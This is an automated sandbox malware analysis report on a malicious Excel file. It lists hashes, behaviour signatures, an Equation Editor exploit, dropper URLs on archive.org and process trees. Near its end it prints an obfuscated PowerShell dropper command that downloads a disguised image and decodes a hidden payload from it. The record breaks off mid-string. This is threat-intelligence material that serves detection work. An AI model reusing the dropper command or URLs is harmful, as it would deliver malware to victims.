f8f5a24f0fb34818d3f59c4508151ce044d373cf9e232d4e330d69ae2cb2b486

Analysis

max time kernel
144s
max time network
109s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
21/08/2024, 02:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f8f5a24f0fb34818d3f59c4508151ce044d373cf9e232d4e330d69ae2cb2b486.xls
Size

331KB
MD5

eaaed9cc781e682ac037d2a2450f198c
SHA1

8599710edfe04be096d1a500bb0f8a3b9ec1fb63
SHA256

f8f5a24f0fb34818d3f59c4508151ce044d373cf9e232d4e330d69ae2cb2b486
SHA512

3c1f51b80d9d71bd2d4adafdaa1f35826d165c956223176aa688b50f46917b68a9cfc00f82dc104e2e7f03279c69cdfb2fd63e4641c5b0f56eefea10ae44e22a
SSDEEP

6144:pMSay9xbU9HIVb5ovxa9hTtGqy1seDWPBmCCGlEOivAolN/jsysdw7JfyToBmo0w:+Say3+fxSt/n66QCCGOOivANfK6TgmA

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
16	2928	EQNEDT32.EXE
18	2348	powershell.exe
19	2348	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2348	powershell.exe
1892	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\Common\Offline\Files\https://jamp.to/X8LwQ3	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2928	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1540	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1892	powershell.exe
2348	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeShutdownPrivilege	2840	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1540	EXCEL.EXE
1540	EXCEL.EXE
1540	EXCEL.EXE
2840	WINWORD.EXE
2840	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 2820	2928	EQNEDT32.EXE	32
PID 2928 wrote to memory of 2820	2928	EQNEDT32.EXE	32
PID 2928 wrote to memory of 2820	2928	EQNEDT32.EXE	32
PID 2928 wrote to memory of 2820	2928	EQNEDT32.EXE	32
PID 2820 wrote to memory of 1892	2820	WScript.exe	33
PID 2820 wrote to memory of 1892	2820	WScript.exe	33
PID 2820 wrote to memory of 1892	2820	WScript.exe	33
PID 2820 wrote to memory of 1892	2820	WScript.exe	33
PID 2840 wrote to memory of 1376	2840	WINWORD.EXE	35
PID 2840 wrote to memory of 1376	2840	WINWORD.EXE	35
PID 2840 wrote to memory of 1376	2840	WINWORD.EXE	35
PID 2840 wrote to memory of 1376	2840	WINWORD.EXE	35
PID 1892 wrote to memory of 2348	1892	powershell.exe	36
PID 1892 wrote to memory of 2348	1892	powershell.exe	36
PID 1892 wrote to memory of 2348	1892	powershell.exe	36
PID 1892 wrote to memory of 2348	1892	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f8f5a24f0fb34818d3f59c4508151ce044d373cf9e232d4e330d69ae2cb2b486.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1540

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1376

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbutterbunwithnewyummybun.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤VQBy⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤JwBo⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bw⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤Og⇱ ؆ ⭢ ⭛ ￤v⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤aQBh⇱ ؆ ⭢ ⭛ ￤Dg⇱ ؆ ⭢ ⭛ ￤M⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤z⇱ ؆ ⭢ ⭛ ￤DE⇱ ؆ ⭢ ⭛ ￤M⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤dQBz⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤YQBy⇱ ؆ ⭢ ⭛ ￤GM⇱ ؆ ⭢ ⭛ ￤a⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤ZQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤cgBn⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤Mg⇱ ؆ ⭢ ⭛ ￤3⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤aQB0⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQBz⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤dgBi⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤Xw⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤D⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤Mg⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤D⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤Nw⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤DY⇱ ؆ ⭢ ⭛ ￤Xw⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤D⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤Mg⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤D⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤Nw⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤DY⇱ ؆ ⭢ ⭛ ￤LwB2⇱ ؆ ⭢ ⭛ ￤GI⇱ ؆ ⭢ ⭛ ￤cw⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Go⇱ ؆ ⭢ ⭛ ￤c⇱ ؆ ⭢ ⭛ ￤Bn⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤Hc⇱ ؆ ⭢ ⭛ ￤ZQBi⇱ ؆ ⭢ ⭛ ￤EM⇱ ؆ ⭢ ⭛ ￤b⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bgB0⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤PQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤E4⇱ ؆ ⭢ ⭛ ￤ZQB3⇱ ؆ ⭢ ⭛ ￤C0⇱ ؆ ⭢ ⭛ ￤TwBi⇱ ؆ ⭢ ⭛ ￤Go⇱ ؆ ⭢ ⭛ ￤ZQBj⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤BT⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤E4⇱ ؆ ⭢ ⭛ ￤ZQB0⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤VwBl⇱ ؆ ⭢ ⭛ ￤GI⇱ ؆ ⭢ ⭛ ￤QwBs⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤ZQBu⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤ZQBC⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤B3⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤YgBD⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤aQBl⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤EQ⇱ ؆ ⭢ ⭛ ￤bwB3⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤b⇱ ؆ ⭢ ⭛ ￤Bv⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤BE⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤Cg⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤VQBy⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤KQ⇱ ؆ ⭢ ⭛ ￤7⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤aQBt⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤ZwBl⇱ ؆ ⭢ ⭛ ￤FQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤WwBT⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤FQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤LgBF⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤YwBv⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤aQBu⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤XQ⇱ ؆ ⭢ ⭛ ￤6⇱ ؆ ⭢ ⭛ ￤Do⇱ ؆ ⭢ ⭛ ￤VQBU⇱ ؆ ⭢ ⭛ ￤EY⇱ ؆ ⭢ ⭛ ￤O⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Ec⇱ ؆ ⭢ ⭛ ￤ZQB0⇱ ؆ ⭢ ⭛ ￤FM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤By⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤bgBn⇱ ؆ ⭢ ⭛ ￤Cg⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤QgB5⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤ZQBz⇱ ؆ ⭢ ⭛ ￤Ck⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BG⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤PQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤P⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤8⇱ ؆ ⭢ ⭛ ￤EI⇱ ؆ ⭢ ⭛ ￤QQBT⇱ ؆ ⭢ ⭛ ￤EU⇱ ؆ ⭢ ⭛ ￤Ng⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤F8⇱ ؆ ⭢ ⭛ ￤UwBU⇱ ؆ ⭢ ⭛ ￤EE⇱ ؆ ⭢ ⭛ ￤UgBU⇱ ؆ ⭢ ⭛ ￤D4⇱ ؆ ⭢ ⭛ ￤Pg⇱ ؆ ⭢ ⭛ ￤n⇱ ؆ ⭢ ⭛ ￤Ds⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤BG⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤PQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤P⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤8⇱ ؆ ⭢ ⭛ ￤EI⇱ ؆ ⭢ ⭛ ￤QQBT⇱ ؆ ⭢ ⭛ ￤EU⇱ ؆ ⭢ ⭛ ￤Ng⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤F8⇱ ؆ ⭢ ⭛ ￤RQBO⇱ ؆ ⭢ ⭛ ￤EQ⇱ ؆ ⭢ ⭛ ￤Pg⇱ ؆ ⭢ ⭛ ￤+⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BJ⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤Hg⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤V⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤Hg⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Ek⇱ ؆ ⭢ ⭛ ￤bgBk⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤e⇱ ؆ ⭢ ⭛ ￤BP⇱ ؆ ⭢ ⭛ ￤GY⇱ ؆ ⭢ ⭛ ￤K⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BG⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤Ck⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bgBk⇱ ؆ ⭢ ⭛ ￤Ek⇱ ؆ ⭢ ⭛ ￤bgBk⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤e⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤D0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤ZQBU⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤e⇱ ؆ ⭢ ⭛ ￤B0⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤SQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤E8⇱ ؆ ⭢ ⭛ ￤Zg⇱ ؆ ⭢ ⭛ ￤o⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤ZQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤RgBs⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤Zw⇱ ؆ ⭢ ⭛ ￤p⇱ ؆ ⭢ ⭛ ￤Ds⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bz⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤YQBy⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤SQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤LQBn⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤w⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤LQBh⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤ZQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤SQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤LQBn⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BJ⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤Hg⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BJ⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤Hg⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤r⇱ ؆ ⭢ ⭛ ￤D0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BG⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤YQBn⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤T⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤ZwB0⇱ ؆ ⭢ ⭛ ￤Gg⇱ ؆ ⭢ ⭛ ￤Ow⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤GI⇱ ؆ ⭢ ⭛ ￤YQBz⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤Ng⇱ ؆ ⭢ ⭛ ￤0⇱ ؆ ⭢ ⭛ ￤Ew⇱ ؆ ⭢ ⭛ ￤ZQBu⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bo⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤PQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤ZQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤SQBu⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQB4⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤LQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤cgB0⇱ ؆ ⭢ ⭛ ￤Ek⇱ ؆ ⭢ ⭛ ￤bgBk⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤e⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤7⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤YgBh⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤ZQ⇱ ؆ ⭢ ⭛ ￤2⇱ ؆ ⭢ ⭛ ￤DQ⇱ ؆ ⭢ ⭛ ￤QwBv⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤D0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤ZQBU⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤e⇱ ؆ ⭢ ⭛ ￤B0⇱ ؆ ⭢ ⭛ 